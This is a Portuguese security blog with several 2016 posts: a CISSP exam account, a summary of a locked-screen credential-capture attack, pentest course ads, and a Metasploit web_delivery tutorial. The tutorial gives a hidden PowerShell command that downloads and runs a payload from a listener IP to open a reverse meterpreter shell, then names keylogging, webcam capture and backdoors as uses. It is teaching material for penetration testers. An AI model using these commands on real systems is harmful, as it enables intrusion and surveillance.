9 de setembro de 2016

Enfim, CISSP!

Hoje fiz minha prova de CISSP, primeira e única tentativa.

Há algumas semanas atrás agendei minha prova para o dia 26 de Outubro/2016, mas anteontem recebi um email da Pearson Vue dizendo que o centro de exames credenciado pela ISC2 aqui no Rio de Janeiro (Allen) não poderia aplicar a prova no dia agendado, e que precisaria remarcar. Qual não foi minha surpresa ao ver que as únicas datas disponíveis seriam dias 08 ou 09 de Setembro (hoje). Caso não quisesse remarcar para esses dias, tinha duas opções: solicitar o reembolso e desistir da prova, ou ir à outro estado para fazer a prova.

Como estava contando com as duas primeiras semanas de Outubro para estudar, durante minhas férias, não me sentia preparado para a prova, pois só havia lido o livro "CISSP 11th Hour, 2nd Edition". Mas um grande amigo meu (valeu Matuck!), me deu força para reagendar a prova para hoje mesmo, já que meu atual empregador estava pagando minha prova passando ou não no exame.

Bem, depois de desfiar esse terço e contar minha história triste, é hora de contar um pouco de minha estratégia para a prova. Usei basicamente quatro fontes de estudo para me preparar o pouco que foi possível. Foram elas, de acordo com o período:

- nos últimos dois meses: lia o livro "CISSP 11th Hour, 2nd Edition" de Eric Conrad, sempre no metrô, usando o Kindle no celular, durante o trajeto de casa para o trabalho e do trabalho para casa. Isso permitiu que eu conseguisse ler o livro inteiro uma única vez, já que é um livro resumido de pouco mais de 200 páginas.
- durante um mês antes dos Jogos Olímpicos: estudava cerca de 20 questões de simulados por dia usando questões de exemplos que encontrava em livros e materiais encontrados na internet. Precisei parar com isso durante as Olimpíadas, por conta de meu horário de trabalho com escalas de 12h virando a noite.
- ontem à noite, durante 2h: entrei no www.cybrary.it e baixei apenas os slides do curso de CISSP. Não tinha tempo para assistir os vídeos, então só li os pouco mais de 580 slides, onde todos os domínios estavam resumidos. Ajudou muito, por sinal, e ainda é gratuito!
- ontem à noite, durante 2h: como último recurso, um amigo mandou para mim um material de 11 páginas com um resumo muito bem construído do conteúdo abordado pela prova. Caso tenham interesse, podem baixar por esse link! Posso dizer que é o resumo total do que li no CISSP 11th Hour e nos slides da Cybrary, e pode ajudar muito para relembrar conteúdos antes da prova.

Essa foi minha estratégia e, como escrevi acima, permitiu que na primeira vez eu conseguisse passar na prova.

Obviamente não vou negar que os 20 anos de atuação na área de TI (comecei a trabalhar com 17 anos com TI de carteira assinada), e dentro desses 20 anos, os 15 de experiência com segurança da informação, me ajudaram muito, pois essa vivência fez com que eu só precisasse relembrar conceitos, ao invés de precisar aprender algo do zero. Posso citar alguns exemplos:

- criptografia: fiz há 3 anos atrás a prova de GXPN, que tem conceitos de criptografia bem mais aprofundados que o CISSP, então esse conteúdo foi tranquilo;
- domínio de segurança em SDLC: sou líder de um capítulo da OWASP desde 2012, e já dei treinamento para 12 turmas dentro de uma grande multinacional sobre segurança em SDLC;
- segurança em redes: atuando como gerente de segurança, colocando a mão na massa e ainda fazendo pentest, isso facilitou muito;
- BCP e DR: vivenciei isso na prática em grandes projetos, incluindo nos Jogos Olímpicos;
- security assessment: como pentester há mais de 10 anos, esse conteúdo foi bem tranquilo;
- gestão de segurança, governança, e compliance: também com experiência no desenvolvimento e auditoria de políticas e controles de segurança, o conteúdo foi bem tranquilo.

Agora, algumas dicas podem ajudar muito, já que o segredo da prova é entender como a ISC2 pensou ao desenvolver as questões:
- trabalhe com eliminação, pois sempre há mais de uma questão correta, então leia bem o enunciado e preste atenção em pegadinhas, tentando entender qual é a resposta MAIS correta que as outras;
- você precisa fazer a prova com a visão de um Analista de Riscos;
- na dúvida, a segurança física é sempre a melhor opção, pois é a primeira camada da segurança em profundidade;
- sempre aplique o conceito de segurança em camadas (produndidade);
- a segurança das pessoas sempre vem em primeiro lugar, SEMPRE!

Com essas dicas em mente, faça tantos simulados quanto forem possíveis, pois assim entenderá o mindset da ISC2, e então é só agendar a prova, que por enquanto não tem mais local para fazer no RJ. Quem quiser, precisará ir para São Paulo, Belo Horizonte, Curitiba ou Brasília.

E por último, como todo o material que estudei estava em inglês, optei por fazer a prova nesse idioma, para não correr o risco de confundir termos.

De 6h que poderia utilizar, finalizei a prova em metade do tempo permitido, não fazendo nenhum break, pois fiquei focado em não perder tempo ou a linha de raciocínio. Mas o mais chato para mim, foi não receber o resultado logo quando enviei as questões respondidas; ainda precisei ir até a recepção e aguardar a impressão do resultado....rs. Longos minutos de tensão...

Bem, é isso aí! Espero que as dicas ajudem, e que algum de vocês possa aproveitá-las para passar pelo exame com sucesso.

7 de setembro de 2016

Roubando credenciais de usuários Windows e MAC

É um ataque bem interessante esse descoberto pelo @mubix, e é bem útil emsituações onde o usuário bloqueou a máquina, mas deixou seu usuário logado. O mais interessante é que foi testado e funciona contra todas as versões de Windows e MAC.

Abaixo é possível ver o vídeo do teste com sucesso:



O equipamento utilizado pode ser construído por vocês, ou pode-se usar o HAK5 LAN Turtle, vendido pela HAK5.

A lógica do ataque é razoavelmente simples e só precisa de três coisas: um dispositivo USB Ethernet + DHCP + Responder, e com isso conseguimos capturar as credenciais de um computador que esteja com sua tela de login bloqueada, porém com um usuário logado.

Nesse link tem toda a informação necessária para entender o ataque, criar seu próprio USB Armory pronto para o ataque, ou como configurar o HAK5 LAN Turtle que já vem quase pronto para o ataque.

Divirtam-se!


22 de junho de 2016

Curso Pentest Avançado e Introdução à Exploração de Softwares - EAD - Out/2016

Mesmo curso ministrado para a divisão de Defesa Cibernética do Exército!

Curso que alia prática e teoria, abordando técnicas avançadas de exploração de sistemas, redes e protocolos vulneráveis. Com esse conteúdo, o aluno será capaz de sair do básico de teste de invasão e partir para um outro nível, com técnicas de exploração mais avançadas e conhecimento necessário para descobrir vulnerabilidades em aplicações e criar seus próprios exploits.

O curso abordará técnicas de exploração tanto de Windows quanto Linux, e cobrirá os tópicos abaixo, de uma forma macro:

  • Explorando Redes - Onde o aluno aprenderá como burlar os controles de acesso de uma rede, bem como explorar vulnerabilidades comuns em redes modernas e seus protocolos.
  • Manipulando a Rede - O aluno será capaz de entender como manipular sistemas de rede para ganhar acesso privilegiado e a oportunidade de explorar sistemas dentro das mesmas.
  • Burlando Ambientes Restritos - Serão demonstrados ambientes em Linux e Windows, com restrições de Desktop, e as ferramentas e técnicas para burlar tais restrições.
  • Softwares Maliciosos e Bypass de Antivírus - O aluno aprenderá como injetar rotinas maliciosas em binários funcionais, e controlar o fluxo de execução de seu código. Verá na prática também, como burlar antivírus, controlando o fluxo de binários maliciosos, alterando assinatura, usando técnicas de anti-debugging e criptografia.
  • Introdução às Técnicas de Fuzzing - O aluno aprenderá como funciona de forma prática, bem como os benefícios, as técnicas de protocol fuzzing para identificar falhas em sistemas alvo.
  • Técnicas Avançadas de Fuzzing - O aluno será capaz de criar sequências de testes customizados utilizando o framework Sulley.
  • Introdução à Exploração de Sistemas Windows - O aluno entenderá os conceitos básicos de Windows para explorar as falhas comuns desse sistema e os Compile-Time Controls.
  • Windows Overflows - O aluno aprenderá como explorar vulnerabilidades no Windows a partir da stack, e burlar proteções de memória.
  • Introdução à Memória Dinâmica do Linux - O aluno aprenderá um pouco sobre arquitetura de processadores X86, gerenciamento de memória no Linux, assembly, linkedição e carregamento de processos.
  • Smashing the Stack - Será ensinado ao aluno como escrever exploits básicos para stack overflow e também contra programa protegidos com canary e ASLR.

O aluno montará seus próprios LABs com orientação do instrutor, e poderá utilizar sua infraestrutura para realizar os testes durante a aula, e posteriormente ao assistir os vídeos gravados das aulas.

Máquinas virtuais necessárias: Kali Linux, Windows 7 e outras que serão disponibilizadas pelo instrutor ao início do curso. As máquinas podem ser virtualizadas utilizando VMWare ou VirtualBox.

Quem tiver interesse no curso, por favor, acesse o link http://bit.ly/ZkbwEE e faça sua inscrição no curso "Pentest Avançado e Introdução a Exploração de Softwares". Para pagamentos via Paypal ou PagSeguro, após preencher o formulário, aguarde o e-mail com o link de cobrança.

Carga horária: 40h
Investimento: R$ 981,00 à vista (ou 1.090,00 com possibilidade de parcelamento em até 3x no cartão de crédito via PayPal ou 12x via BCash)
Horário de aula: 22h às 24h
Dias de aula: ter., e qua.
Início das aulas: 25/10/2016
Local: Internet

20 de maio de 2016

Venda de cursos já realizados

Pessoal, sei que muita gente as vezes acaba perdendo uma turma ou outra dos cursos que realizo, seja por falta de tempo, ou dinheiro, naquele momento em que estou formando as turmas. 

Por conta disso é possível adquirir, após a realização das turmas, o material de cada uma delas. No material sempre estão inclusos os slides, os vídeos e os arquivos utilizados em cada curso, e em alguns inclusive disponibilizo a apostila e máquinas virtuais para os laboratórios (esses dois últimos, nem todos os cursos tem, mas todos tem os vídeos e slides).

Quando o aluno adquire o material do curso, é possível ao final de seus estudos realizar uma avaliação prática para receber o certificado de conclusão do mesmo, caso o aluno tenha interesse.

Os cursos atualmente disponíveis para aquisição são os seguintes, com seus respectivos valores a serem pagos via Paypal em até 3x:

- Hardening de Servidores Linux = 450,00
- Pentest em Redes = 710,00
- Engenharia Social = 400,00
- Pentest em Aplicações WEB = 640,00
- Perícia Forense Digital = 710,00
- Fundamentos de Programação com Assembly e C = 450,00
- Engenharia Reversa e Análise de Malwares = 800,00
- Pentest Avançado e Introdução à Exploração de Softwares = 800,00
- Programação para Pentesters = 800,00

Para pagamentos à vista, é possível um desconto de 10%. E caso adquira mais de um curso, podemos negociar outros descontos.

Quem tiver interesse, basta enviar um e-mail para luizwt at gmail.com.

16 de maio de 2016

Módulo Web Delivery do Metasploit

Muitas vezes estamos em situações em que temos acesso à uma máquina que precisamos explorar, mas sem as ferramentas adequadas ou necessárias naquele momento. Um dos módulos do Metasploit que pode nos ajudar em cenários assim é o web delivery, que permite que remotamente nos conectemos à um IP e tenhamos de retorno um shell, seja command.com ou meterpreter no caso do Metasploit.

Entretanto, é necessário que deixemos nossa máquina com o Metasploit (possivelmente na nuvem) já configurada aguardando a conexão.

Nesse exemplo, vamos ver como compromenter uma máquina Windows, entregando um shell meterpreter via PowerShell (poderia ser via Python ou PHP também).

Em primeiro lugar precisamos entrar no msfconsole e digitar os seguintes comandos:
  • use exploit/multi/script/web_delivery
  • set lhost [Kali IP Address]
  • set lport 4444
Quando digitamos o comando "show targets", vemos as opções de entrega do shell, que em nosso caso será PowerShell:

Então, para selecionar o tipo de entrega e o shell que será entregue, digitamos os dois seguintes comandos:

  • set target 2
  • set payload windows/meterpreter/reverse_tcp
E então executamos o comando "exploit", para colocar nossa máquina numa condição de "listening", que é quando fica aguardando alguém conectar-se para entregar o payload:

E então, na máquina alvo, onde temos acesso físico, digitamos o comando abaixo para forçar a conexão e a entrega do payload:
  • powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.39:8080/eAtfMo'))
E então, na máquina onde temos o Metasploit, veremos uma tentativa de conexão, e uma sessão sendo criada:

E então, ou você já terá um shell via meterpreter com o prompt "meterpreter>" aberto, ou simplesmente precisará digitar o comando "sessions -i [numero-da-sessão]" para conectar-se e começar a brincadeira.

A partir daí, terá todo o poder do meterpreter disponível em suas mãos: keylogger, screenshot, ativar webcam para vídeos e fotos, network sniffing, escalada de privilégios, criar backdoor persistente e etc. Quando quiser finalizar a sessão, basta digitar "exit" e cair de novo no msfconsole.

Have some fun!